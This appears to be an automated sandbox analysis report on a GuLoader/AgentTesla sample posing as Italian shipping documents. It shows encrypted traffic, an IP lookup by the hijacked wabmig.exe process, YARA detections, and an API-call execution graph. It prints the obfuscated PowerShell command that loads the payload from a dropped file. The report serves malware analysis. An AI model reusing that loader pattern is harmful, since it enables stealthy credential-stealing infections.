                                      Date: Wed, 25 Sep 2024 10:09:05 GMT
                                      Content-Length: 241728
                                      Data Raw: e2 5b 6d a6 6d 48 1f 83 31 45 b6 0f a8 a3 a6 12 af ce 14 f1 6e 4d 75 e6 c0 cd 0b d3 a3 de fa 28 3b 05 e8 2e 4e a2 0b 2f 52 d7 2e 67 51 cd c6 04 ec 97 16 dd 07 70 6d 96 9d 65 88 27 ca d1 8b de fb 20 db 23 10 6e 40 d5 02 5e 88 6e 89 62 50 97 54 fa 66 63 4d 19 b2 9a c3 6b d8 34 c2 ca 9a b3 ef 1b e1 bf e6 2f 01 d0 b4 42 8d 54 e8 4e 23 9f db cf 05 48 b6 c8 0f 86 d2 ed 67 ff 35 30 2c b3 cc 76 8c 31 52 5e 3c d6 a1 ef 60 a3 c2 80 78 8c cb 2a c1 71 c3 c3 41 38 81 89 5a 84 1d b3 9d 3f 55 fd 66 ce 70 b0 8a 12 48 2c 9d 04 28 83 e5 0a 19 f8 d6 56 e3 15 98 70 11 d7 37 d8 5e de 41 4f 42 98 8e 84 0d 9a 5e ad 7f 72 64 d9 e7 64 ad fc 39 4b b8 21 25 cd f8 15 9e f9 f3 6c 11 d5 30 fe a6 b9 b2 2a 25 84 4d b3 82 50 32 3e a8 e9 3f 3d f9 28 80 0d ba 81 e1 ef cf 0b eb 07 93 70 76 d4 88 43 2b 53 ae f3 f8 3f 68 79 fe 3b bc 56 4b 08 3e 61 fd 8a 45 cf 65 6a e7 96 45 47 8c c4 2d aa 7a 45 cf 8b 9e 54 ea 16 99 6e 7b 7e 13 56 73 86 82 cb 89 2d 8a 32 f0 75 44 20 ef ab f0 59 7a fd 93 c9 43 d9 09 60 0e 22 56 35 97 41 ee 31 74 d2 b4 3e [TRUNCATED]
                                      Data Ascii: [mmH1EnMu(;.N/R.gQpme' #n@^nbPTfcMk4/BTN#Hg50,v1R^<`x*qA8Z?UfpH,(Vp7^AOB^rdd9K!%l0*%MP2>?=(pvC+S?hy;VK>aEejEG-zETn{~Vs-2uD YzC`"V5A1t>I$GAgK?D(5~>#=C 4x}$PTIIRj_w]4-j+3?(Is[Xqb*yjtk3?r4c206F.XgG3=#/uh3xt{ l:YIu[8*.7)pyum_SP0:59[U?K'HN6d8tT*%uo^5{D"~]:E&z3*(Hpg?"Y|zzniLc(3-BaV6jBcnmb%xwPvt#KM%,"dg\6rSr`2uHjLsw{)IqEzy}~z=y}!](X(P_x-u[U-5b?)KNK!VVGn%}md[B6>Zn9Pq6G]D>*dv8
                                      Sep 25, 2024 12:09:07.525562048 CEST1236INData Raw: b8 f6 ab b8 29 a5 91 be 89 ed 43 85 cb 7a 9b 36 1d 89 a3 c4 88 f0 74 1d 09 b6 35 0f 86 be d0 47 67 e4 ae 44 2d db 67 af b2 d6 70 34 9a c8 c4 58 cc e2 26 26 28 44 19 17 0d 77 00 2a 5d 87 5e 5e 4a 5b 9d de dd a9 89 35 ed d6 2a 65 1a 30 2a b1 c0 db
                                      Data Ascii: )Cz6t5GgD-gp4X&&(Dw*]^^J[5*e0*SnKuL(&a[WN)+8)NK-hGK#1#?u+p&poeE!oK",-L@>ZS<.8\P_em>$3
                                      Sep 25, 2024 12:09:07.525576115 CEST448INData Raw: 32 79 3a 2f ca 6d 13 b6 22 7b 1b 9a b5 9c 41 0c 0f fe 9b b0 43 49 2d 87 54 3d 6f d4 7a 97 ce bb 9c a4 b1 c6 14 77 65 de aa 39 d4 48 1f 32 1f b5 fe d8 d3 2c 4b f3 0b 99 e0 3e 00 a9 4d f1 fc e7 f2 81 20 c1 f4 b7 7b 2d 55 26 df a7 a8 67 0a e1 81 df
                                      Data Ascii: 2y:/m"{ACI-T=ozwe9H2,K>M {-U&g&bEf\y{*3z9_+*KX*s2PEG>.)*q|yt`P^1>^V!o\%I*lMKhV'/A%$+Wp(#c$
                                      Sep 25, 2024 12:09:07.525592089 CEST1236INData Raw: 5a 0f 8d f6 c5 18 c9 b4 fb 90 f2 b3 3c 00 54 23 32 df ab 08 03 0f 15 0f 25 70 b0 88 40 77 62 47 e1 32 7b be 06 86 d9 79 e0 85 27 bc dc 17 fa 60 fe c2 70 2e 64 9c 78 43 c3 23 47 87 06 c2 aa 73 41 93 cb 61 54 2e 52 7d 9f 4a ba 1c dd a3 35 c7 25 22
                                      Data Ascii: Z<T#2%p@wbG2{y'`p.dxC#GsAaT.R}J5%"i^\|#Bc#^LUt0s6nNpbauP"';r;I0cHFs'?fU_*)>, EhFA66K5Q?1C2
                                      Sep 25, 2024 12:09:07.525605917 CEST1236INData Raw: ae 94 32 ab ac b6 e8 45 b8 79 f2 8b bd b1 db b3 58 47 1b 81 d3 a6 eb 98 16 9b fa ba fa 59 65 9f f6 ba 2d df cd a5 a4 fc ee b6 b2 10 c6 58 ca 48 70 a4 00 e3 9b 17 0b 75 83 fd 69 05 5e a7 48 df 35 78 df fc e1 7e ed a5 46 47 46 6e 08 c3 a3 f0 67 51
                                      Data Ascii: 2EyXGYe-XHpui^H5x~FGFngQ47 'ltlMS,*u|-=GNH:/=%-AL!5xjsDp"7/GO[/MZN;cR.`.Si$a;"2$
                                      Sep 25, 2024 12:09:07.525619984 CEST448INData Raw: 34 2e b7 da 13 b6 26 51 af 99 a4 85 41 0c 05 fc c9 aa 63 49 5d 51 b3 3f 6f d2 ae 85 ce c0 24 a6 b1 c2 3e ab 66 e4 d2 a1 d4 48 23 1d 55 b7 d6 f3 cc d3 be 0e 53 05 f1 3b 70 d4 a2 f1 fc e2 d8 9f 33 9a 6d b7 7b 29 81 0a da a4 ed a0 0a e1 85 f5 48 97
                                      Data Ascii: 4.&QAcI]Q?o$>fH#US;p3m{)HqelQdzMgO_(c(-x:LP6.-W$SY/t3A^&FfInGIRV9=B^h$/}BGCmQUm
                                      Sep 25, 2024 12:09:07.606007099 CEST1236INData Raw: af dc d0 65 6d be 05 9a dc ad c0 76 f5 23 40 ce 81 2a 71 24 7f aa 25 7a 16 5c 52 76 19 c1 e5 32 7f 94 56 e7 da 04 36 27 d9 b4 f5 09 d0 03 59 c2 7a 58 21 be 7a 30 96 8d 47 87 04 16 bd 71 3a 49 b6 61 50 74 58 62 9c 37 18 34 ce a5 1f df fa db 4a 94
                                      Data Ascii: emv#@*q$%z\Rv2V6'YzX!z0Gq:IaPtXb74JiQ\xfm"j}BfZp1GIf%."1PKu@QOBYg,BtYV(h$i84Ej#J*%6IG,y1,g
                                      Sep 25, 2024 12:09:07.606035948 CEST1236INData Raw: 2a a3 52 bd c7 13 92 65 ea 89 b7 8d ba 4f da e0 c7 91 d7 a4 ef 1b 42 9f fa 40 c6 41 67 e4 b5 d4 0b db e7 a5 6e 28 fc b5 9a 58 f1 58 cc 68 d8 a8 2e c4 a1 d7 0d 77 80 2b 50 01 5e 89 7c db 1d 54 23 f2 e3 54 71 b6 4b 45 15 6e 0b c3 a1 88 62 79 c6 36
                                      Data Ascii: *ReOB@Agn(XXh.w+P^|T#TqKEnby6$|`&qbSaPN/yL@)/3/65~ku/A/g7pE)x;*_N7fP#.$^eSw#*$
                                      Sep 25, 2024 12:09:07.606051922 CEST1236INData Raw: a0 fa 13 b6 06 5e 51 98 9d 02 74 0c 05 fd 17 a5 62 49 7d ad bd 3d 6f 2c 5e 8a cc c0 fa a8 b2 c2 1e 51 67 dd d7 5f d5 71 03 18 55 b7 28 c7 d2 2c 61 f3 79 1e c1 4c 77 83 a0 81 5e c1 dd 9f 22 ba 93 b9 78 29 7f fa d1 a7 d5 de 06 e1 85 f5 48 9a 37 69
                                      Data Ascii: ^QtbI}=o,^Qg_qU(,ayLw^"x)H7iEl4{R@w=9r}'cXP!MPo.-QQZy=q4i32_R+F^&n]HHjgG1cYH$|/)Q+%
                                      Sep 25, 2024 12:09:07.606065989 CEST1236INData Raw: 0a d9 3e 6a 2e 37 39 28 90 63 79 75 15 b5 a8 13 8e 16 54 44 fa 53 50 f0 f2 1c 3a 90 f5 d2 35 ba 39 e9 b9 59 55 27 81 5e 6d 87 c1 ab 40 8f 06 91 a4 59 0c b9 ce f7 30 27 f3 b0 da 28 73 c1 b2 3c e4 87 38 11 e1 54 00 54 cb 0c d4 dd 25 d8 8e f8 cd 08
                                      Data Ascii: >j.79(cyuTDSP:59YU'^m@Y0'(s<8TT%ul^z}"@.A :F]\mc7d~7<MZRmvg*0Q:h`5-tqIW3b,Be0!%y=Wt|G[+H'hBi+dI]
                                      Sep 25, 2024 12:09:07.606092930 CEST896INData Raw: 6a 4d af 34 54 d2 b4 3e 0f 43 f9 9d 49 e2 cf 24 ae bd 3d 85 df ba c4 67 58 82 f7 b7 4f de 0b fc e3 99 47 33 44 ba 87 8a 9f 28 24 ff a2 a9 8c 35 ed 67 aa e4 7e cf be 18 9f 98 85 7b 23 f4 07 c3 11 43 20 14 0b 78 87 02 4c 0e 91 7d 0f 2f 1f a8 19 04
                                      Data Ascii: jM4T>CI$=gXOG3D($5g~{#C xL}/zT9pRj7T]8f_FKF~[Xah)/whk?3rB2:Oh=g#V/t i l4iuMf*7lps3m_


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449738104.26.13.2054436824C:\Program Files (x86)\Windows Mail\wabmig.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-25 10:09:09 UTC155OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      2024-09-25 10:09:09 UTC211INHTTP/1.1 200 OK
                                      Date: Wed, 25 Sep 2024 10:09:09 GMT
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8c8a37906e2c43e2-EWR
                                      2024-09-25 10:09:09 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                      Data Ascii: 8.46.123.33


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:06:07:56
                                      Start date:25/09/2024
                                      Path:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"
                                      Imagebase:0x400000
                                      File size:748'488 bytes
                                      MD5 hash:6C446FD0A3F6D498F5CBD0725CE7F232
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:06:07:57
                                      Start date:25/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
                                      Imagebase:0xfb0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2394657139.0000000008C11000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:06:07:57
                                      Start date:25/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:06:08:57
                                      Start date:25/09/2024
                                      Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                      Imagebase:0x2e0000
                                      File size:66'048 bytes
                                      MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:25.1%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.2%
                                        Total number of Nodes:1463
                                        Total number of Limit Nodes:46
                                        execution_graph 4208 404f43 GetDlgItem GetDlgItem 4209 404f95 7 API calls 4208->4209 4217 4051ba 4208->4217 4210 40503c DeleteObject 4209->4210 4211 40502f SendMessageW 4209->4211 4212 405045 4210->4212 4211->4210 4213 40507c 4212->4213 4218 406594 21 API calls 4212->4218 4215 4044d6 22 API calls 4213->4215 4214 40529c 4216 405348 4214->4216 4221 4051ad 4214->4221 4227 4052f5 SendMessageW 4214->4227 4220 405090 4215->4220 4222 405352 SendMessageW 4216->4222 4223 40535a 4216->4223 4217->4214 4242 405229 4217->4242 4262 404e91 SendMessageW 4217->4262 4219 40505e SendMessageW SendMessageW 4218->4219 4219->4212 4226 4044d6 22 API calls 4220->4226 4224 40453d 8 API calls 4221->4224 4222->4223 4230 405373 4223->4230 4231 40536c ImageList_Destroy 4223->4231 4238 405383 4223->4238 4229 405549 4224->4229 4243 4050a1 4226->4243 4227->4221 4233 40530a SendMessageW 4227->4233 4228 40528e SendMessageW 4228->4214 4234 40537c GlobalFree 4230->4234 4230->4238 4231->4230 4232 4054fd 4232->4221 4239 40550f ShowWindow GetDlgItem ShowWindow 4232->4239 4236 40531d 4233->4236 4234->4238 4235 40517c GetWindowLongW SetWindowLongW 4237 405195 4235->4237 4247 40532e SendMessageW 4236->4247 4240 4051b2 4237->4240 4241 40519a ShowWindow 4237->4241 4238->4232 4255 4053be 4238->4255 4267 404f11 4238->4267 4239->4221 4261 40450b SendMessageW 4240->4261 4260 40450b SendMessageW 4241->4260 4242->4214 4242->4228 4243->4235 4246 4050f4 SendMessageW 4243->4246 4248 405177 4243->4248 4249 405132 SendMessageW 4243->4249 4250 405146 SendMessageW 4243->4250 4246->4243 4247->4216 4248->4235 4248->4237 4249->4243 4250->4243 4252 4054c8 4253 4054d3 InvalidateRect 4252->4253 4257 4054df 4252->4257 4253->4257 4254 4053ec SendMessageW 4256 405402 4254->4256 4255->4254 4255->4256 4256->4252 4258 405476 SendMessageW SendMessageW 4256->4258 4257->4232 4276 404e4c 4257->4276 4258->4256 4260->4221 4261->4217 4263 404ef0 SendMessageW 4262->4263 4264 404eb4 GetMessagePos ScreenToClient SendMessageW 4262->4264 4265 404ee8 4263->4265 4264->4265 4266 404eed 4264->4266 4265->4242 4266->4263 4279 406557 lstrcpynW 4267->4279 4269 404f24 4280 40649e wsprintfW 4269->4280 4271 404f2e 4272 40140b 2 API calls 4271->4272 4273 404f37 4272->4273 4281 406557 lstrcpynW 4273->4281 4275 404f3e 4275->4255 4282 404d83 4276->4282 4278 404e61 4278->4232 4279->4269 4280->4271 4281->4275 4283 404d9c 4282->4283 4284 406594 21 API calls 4283->4284 4285 404e00 4284->4285 4286 406594 21 API calls 4285->4286 4287 404e0b 4286->4287 4288 406594 21 API calls 4287->4288 4289 404e21 lstrlenW wsprintfW SetDlgItemTextW 4288->4289 4289->4278 4290 402643 4291 402672 4290->4291 4292 402657 4290->4292 4294 4026a2 4291->4294 4295 402677 4291->4295 4293 402d89 21 API calls 4292->4293 4304 40265e 4293->4304 4297 402dab 21 API calls 4294->4297 4296 402dab 21 API calls 4295->4296 4298 40267e 4296->4298 4299 4026a9 lstrlenW 4297->4299 4307 406579 WideCharToMultiByte 4298->4307 4299->4304 4301 402692 lstrlenA 4301->4304 4302 4026d6 4303 4026ec 4302->4303 4305 4060f9 WriteFile 4302->4305 4304->4302 4304->4303 4308 406128 SetFilePointer 4304->4308 4305->4303 4307->4301 4309 40615c 4308->4309 4310 406144 4308->4310 4309->4302 4311 4060ca ReadFile 4310->4311 4312 406150 4311->4312 4312->4309 4313 406165 SetFilePointer 4312->4313 4314 40618d SetFilePointer 4312->4314 4313->4314 4315 406170 4313->4315 4314->4309 4316 4060f9 WriteFile 4315->4316 4316->4309 4317 73a9102d 4318 73a91096 73 API calls 4317->4318 4319 73a91058 4318->4319 3300 4015c6 3301 402dab 21 API calls 3300->3301 3302 4015cd 3301->3302 3319 405ed1 CharNextW CharNextW 3302->3319 3304 401636 3305 40163b 3304->3305 3308 401668 3304->3308 3331 401423 3305->3331 3306 405e53 CharNextW 3315 4015d6 3306->3315 3310 401423 28 API calls 3308->3310 3317 401660 3310->3317 3314 40164f SetCurrentDirectoryW 3314->3317 3315->3304 3315->3306 3316 40161c GetFileAttributesW 3315->3316 3325 405b22 3315->3325 3328 405aab CreateDirectoryW 3315->3328 3335 405b05 CreateDirectoryW 3315->3335 3316->3315 3320 405eee 3319->3320 3322 405f00 3319->3322 3321 405efb CharNextW 3320->3321 3320->3322 3324 405f24 3321->3324 3323 405e53 CharNextW 3322->3323 3322->3324 3323->3322 3324->3315 3326 40694b 5 API calls 3325->3326 3327 405b29 3326->3327 3327->3315 3329 405afb GetLastError 3328->3329 3330 405af7 3328->3330 3329->3330 3330->3315 3332 4055dc 28 API calls 3331->3332 3333 401431 3332->3333 3334 406557 lstrcpynW 3333->3334 3334->3314 3336 405b15 3335->3336 3337 405b19 GetLastError 3335->3337 3336->3315 3337->3336 3338 401946 3339 401948 3338->3339 3340 402dab 21 API calls 3339->3340 3341 40194d 3340->3341 3344 405c63 3341->3344 3384 405f2e 3344->3384 3347 405ca2 3350 405dcd 3347->3350 3398 406557 lstrcpynW 3347->3398 3348 405c8b DeleteFileW 3349 401956 3348->3349 3350->3349 3355 4068b4 2 API calls 3350->3355 3352 405cc8 3353 405cdb 3352->3353 3354 405cce lstrcatW 3352->3354 3399 405e72 lstrlenW 3353->3399 3356 405ce1 3354->3356 3360 405de7 3355->3360 3358 405cf1 lstrcatW 3356->3358 3359 405ce7 3356->3359 3361 405cfc lstrlenW FindFirstFileW 3358->3361 3359->3358 3359->3361 3360->3349 3362 405deb 3360->3362 3363 405dc2 3361->3363 3366 405d1e 3361->3366 3416 405e26 lstrlenW CharPrevW 3362->3416 3363->3350 3367 405da5 FindNextFileW 3366->3367 3377 405c63 64 API calls 3366->3377 3379 4055dc 28 API calls 3366->3379 3381 4055dc 28 API calls 3366->3381 3403 406557 lstrcpynW 3366->3403 3404 405c1b 3366->3404 3412 406317 MoveFileExW 3366->3412 3367->3366 3371 405dbb FindClose 3367->3371 3368 405c1b 5 API calls 3370 405dfd 3368->3370 3372 405e01 3370->3372 3373 405e17 3370->3373 3371->3363 3372->3349 3376 4055dc 28 API calls 3372->3376 3374 4055dc 28 API calls 3373->3374 3374->3349 3378 405e0e 3376->3378 3377->3366 3380 406317 40 API calls 3378->3380 3379->3367 3382 405e15 3380->3382 3381->3366 3382->3349 3419 406557 lstrcpynW 3384->3419 3386 405f3f 3387 405ed1 4 API calls 3386->3387 3388 405f45 3387->3388 3389 405c83 3388->3389 3390 406805 5 API calls 3388->3390 3389->3347 3389->3348 3396 405f55 3390->3396 3391 405f86 lstrlenW 3392 405f91 3391->3392 3391->3396 3394 405e26 3 API calls 3392->3394 3393 4068b4 2 API calls 3393->3396 3395 405f96 GetFileAttributesW 3394->3395 3395->3389 3396->3389 3396->3391 3396->3393 3397 405e72 2 API calls 3396->3397 3397->3391 3398->3352 3400 405e80 3399->3400 3401 405e92 3400->3401 3402 405e86 CharPrevW 3400->3402 3401->3356 3402->3400 3402->3401 3403->3366 3420 406022 GetFileAttributesW 3404->3420 3407 405c48 3407->3366 3408 405c36 RemoveDirectoryW 3410 405c44 3408->3410 3409 405c3e DeleteFileW 3409->3410 3410->3407 3411 405c54 SetFileAttributesW 3410->3411 3411->3407 3413 406338 3412->3413 3414 40632b 3412->3414 3413->3366 3423 40619d 3414->3423 3417 405e42 lstrcatW 3416->3417 3418 405df1 3416->3418 3417->3418 3418->3368 3419->3386 3421 405c27 3420->3421 3422 406034 SetFileAttributesW 3420->3422 3421->3407 3421->3408 3421->3409 3422->3421 3424 4061f3 GetShortPathNameW 3423->3424 3425 4061cd 3423->3425 3427 406312 3424->3427 3428 406208 3424->3428 3450 406047 GetFileAttributesW CreateFileW 3425->3450 3427->3413 3428->3427 3429 406210 wsprintfA 3428->3429 3431 406594 21 API calls 3429->3431 3430 4061d7 CloseHandle GetShortPathNameW 3430->3427 3432 4061eb 3430->3432 3433 406238 3431->3433 3432->3424 3432->3427 3451 406047 GetFileAttributesW CreateFileW 3433->3451 3435 406245 3435->3427 3436 406254 GetFileSize GlobalAlloc 3435->3436 3437 406276 3436->3437 3438 40630b CloseHandle 3436->3438 3452 4060ca ReadFile 3437->3452 3438->3427 3443 406295 lstrcpyA 3446 4062b7 3443->3446 3444 4062a9 3445 405fac 4 API calls 3444->3445 3445->3446 3447 4062ee SetFilePointer 3446->3447 3459 4060f9 WriteFile 3447->3459 3450->3430 3451->3435 3453 4060e8 3452->3453 3453->3438 3454 405fac lstrlenA 3453->3454 3455 405fed lstrlenA 3454->3455 3456 405ff5 3455->3456 3457 405fc6 lstrcmpiA 3455->3457 3456->3443 3456->3444 3457->3456 3458 405fe4 CharNextA 3457->3458 3458->3455 3460 406117 GlobalFree 3459->3460 3460->3438 4320 404646 lstrlenW 4321 404665 4320->4321 4322 404667 WideCharToMultiByte 4320->4322 4321->4322 4323 4049c7 4324 4049f3 4323->4324 4325 404a04 4323->4325 4384 405b9b GetDlgItemTextW 4324->4384 4327 404a10 GetDlgItem 4325->4327 4333 404a6f 4325->4333 4329 404a24 4327->4329 4328 4049fe 4331 406805 5 API calls 4328->4331 4332 404a38 SetWindowTextW 4329->4332 4336 405ed1 4 API calls 4329->4336 4330 404b53 4381 404d02 4330->4381 4386 405b9b GetDlgItemTextW 4330->4386 4331->4325 4337 4044d6 22 API calls 4332->4337 4333->4330 4338 406594 21 API calls 4333->4338 4333->4381 4335 40453d 8 API calls 4343 404d16 4335->4343 4344 404a2e 4336->4344 4340 404a54 4337->4340 4341 404ae3 SHBrowseForFolderW 4338->4341 4339 404b83 4342 405f2e 18 API calls 4339->4342 4345 4044d6 22 API calls 4340->4345 4341->4330 4346 404afb CoTaskMemFree 4341->4346 4347 404b89 4342->4347 4344->4332 4350 405e26 3 API calls 4344->4350 4348 404a62 4345->4348 4349 405e26 3 API calls 4346->4349 4387 406557 lstrcpynW 4347->4387 4385 40450b SendMessageW 4348->4385 4352 404b08 4349->4352 4350->4332 4355 404b3f SetDlgItemTextW 4352->4355 4359 406594 21 API calls 4352->4359 4354 404a68 4357 40694b 5 API calls 4354->4357 4355->4330 4356 404ba0 4358 40694b 5 API calls 4356->4358 4357->4333 4366 404ba7 4358->4366 4360 404b27 lstrcmpiW 4359->4360 4360->4355 4363 404b38 lstrcatW 4360->4363 4361 404be8 4388 406557 lstrcpynW 4361->4388 4363->4355 4364 404bef 4365 405ed1 4 API calls 4364->4365 4367 404bf5 GetDiskFreeSpaceW 4365->4367 4366->4361 4370 405e72 2 API calls 4366->4370 4371 404c40 4366->4371 4369 404c19 MulDiv 4367->4369 4367->4371 4369->4371 4370->4366 4372 404e4c 24 API calls 4371->4372 4382 404cb1 4371->4382 4373 404c9e 4372->4373 4377 404cb3 SetDlgItemTextW 4373->4377 4378 404ca3 4373->4378 4374 40140b 2 API calls 4375 404cd4 4374->4375 4389 4044f8 KiUserCallbackDispatcher 4375->4389 4377->4382 4380 404d83 24 API calls 4378->4380 4379 404cf0 4379->4381 4390 404920 4379->4390 4380->4382 4381->4335 4382->4374 4382->4375 4384->4328 4385->4354 4386->4339 4387->4356 4388->4364 4389->4379 4391 404933 SendMessageW 4390->4391 4392 40492e 4390->4392 4391->4381 4392->4391 3461 401c48 3462 402d89 21 API calls 3461->3462 3463 401c4f 3462->3463 3464 402d89 21 API calls 3463->3464 3465 401c5c 3464->3465 3466 401c71 3465->3466 3467 402dab 21 API calls 3465->3467 3468 402dab 21 API calls 3466->3468 3472 401c81 3466->3472 3467->3466 3468->3472 3469 401cd8 3471 402dab 21 API calls 3469->3471 3470 401c8c 3473 402d89 21 API calls 3470->3473 3474 401cdd 3471->3474 3472->3469 3472->3470 3475 401c91 3473->3475 3476 402dab 21 API calls 3474->3476 3477 402d89 21 API calls 3475->3477 3479 401ce6 FindWindowExW 3476->3479 3478 401c9d 3477->3478 3480 401cc8 SendMessageW 3478->3480 3481 401caa SendMessageTimeoutW 3478->3481 3482 401d08 3479->3482 3480->3482 3481->3482 4393 4028c9 4394 4028cf 4393->4394 4395 4028d7 FindClose 4394->4395 4396 402c2f 4394->4396 4395->4396 3628 4014cb 3629 4055dc 28 API calls 3628->3629 3630 4014d2 3629->3630 4397 405550 4398 405560 4397->4398 4399 405574 4397->4399 4401 405566 4398->4401 4402 4055bd 4398->4402 4400 40557c IsWindowVisible 4399->4400 4408 405593 4399->4408 4400->4402 4404 405589 4400->4404 4403 404522 SendMessageW 4401->4403 4405 4055c2 CallWindowProcW 4402->4405 4406 405570 4403->4406 4407 404e91 5 API calls 4404->4407 4405->4406 4407->4408 4408->4405 4409 404f11 4 API calls 4408->4409 4409->4402 4410 4016d1 4411 402dab 21 API calls 4410->4411 4412 4016d7 GetFullPathNameW 4411->4412 4413 4016f1 4412->4413 4419 401713 4412->4419 4415 4068b4 2 API calls 4413->4415 4413->4419 4414 401728 GetShortPathNameW 4417 402c2f 4414->4417 4416 401703 4415->4416 4416->4419 4420 406557 lstrcpynW 4416->4420 4419->4414 4419->4417 4420->4419 4421 401e53 GetDC 4422 402d89 21 API calls 4421->4422 4423 401e65 GetDeviceCaps MulDiv ReleaseDC 4422->4423 4424 402d89 21 API calls 4423->4424 4425 401e96 4424->4425 4426 406594 21 API calls 4425->4426 4427 401ed3 CreateFontIndirectW 4426->4427 4428 40263d 4427->4428 4429 402955 4430 402dab 21 API calls 4429->4430 4431 402961 4430->4431 4432 402977 4431->4432 4433 402dab 21 API calls 4431->4433 4434 406022 2 API calls 4432->4434 4433->4432 4435 40297d 4434->4435 4457 406047 GetFileAttributesW CreateFileW 4435->4457 4437 40298a 4438 402a40 4437->4438 4441 4029a5 GlobalAlloc 4437->4441 4442 402a28 4437->4442 4439 402a47 DeleteFileW 4438->4439 4440 402a5a 4438->4440 4439->4440 4441->4442 4443 4029be 4441->4443 4444 4032b9 35 API calls 4442->4444 4458 4034ea SetFilePointer 4443->4458 4446 402a35 CloseHandle 4444->4446 4446->4438 4447 4029c4 4448 4034d4 ReadFile 4447->4448 4449 4029cd GlobalAlloc 4448->4449 4450 402a11 4449->4450 4451 4029dd 4449->4451 4453 4060f9 WriteFile 4450->4453 4452 4032b9 35 API calls 4451->4452 4455 4029ea 4452->4455 4454 402a1d GlobalFree 4453->4454 4454->4442 4456 402a08 GlobalFree 4455->4456 4456->4450 4457->4437 4458->4447 4000 403fd7 4001 404150 4000->4001 4002 403fef 4000->4002 4004 404161 GetDlgItem GetDlgItem 4001->4004 4005 4041a1 4001->4005 4002->4001 4003 403ffb 4002->4003 4006 404006 SetWindowPos 4003->4006 4007 404019 4003->4007 4008 4044d6 22 API calls 4004->4008 4009 4041fb 4005->4009 4019 401389 2 API calls 4005->4019 4006->4007 4011 404022 ShowWindow 4007->4011 4012 404064 4007->4012 4013 40418b SetClassLongW 4008->4013 4010 404522 SendMessageW 4009->4010 4025 40414b 4009->4025 4031 40420d 4010->4031 4014 404042 GetWindowLongW 4011->4014 4015 40413d 4011->4015 4016 404083 4012->4016 4017 40406c DestroyWindow 4012->4017 4018 40140b 2 API calls 4013->4018 4014->4015 4021 40405b ShowWindow 4014->4021 4082 40453d 4015->4082 4022 404088 SetWindowLongW 4016->4022 4023 404099 4016->4023 4072 40445f 4017->4072 4018->4005 4024 4041d3 4019->4024 4021->4012 4022->4025 4023->4015 4028 4040a5 GetDlgItem 4023->4028 4024->4009 4029 4041d7 SendMessageW 4024->4029 4026 40140b 2 API calls 4026->4031 4027 404461 DestroyWindow EndDialog 4027->4072 4032 4040d3 4028->4032 4033 4040b6 SendMessageW IsWindowEnabled 4028->4033 4029->4025 4030 404490 ShowWindow 4030->4025 4031->4025 4031->4026 4031->4027 4034 406594 21 API calls 4031->4034 4039 4044d6 22 API calls 4031->4039 4063 4043a1 DestroyWindow 4031->4063 4073 4044d6 4031->4073 4035 4040e0 4032->4035 4036 404127 SendMessageW 4032->4036 4037 4040f3 4032->4037 4045 4040d8 4032->4045 4033->4025 4033->4032 4034->4031 4035->4036 4035->4045 4036->4015 4040 404110 4037->4040 4041 4040fb 4037->4041 4039->4031 4044 40140b 2 API calls 4040->4044 4043 40140b 2 API calls 4041->4043 4042 40410e 4042->4015 4043->4045 4046 404117 4044->4046 4079 4044af 4045->4079 4046->4015 4046->4045 4048 404288 GetDlgItem 4049 4042a5 ShowWindow KiUserCallbackDispatcher 4048->4049 4050 40429d 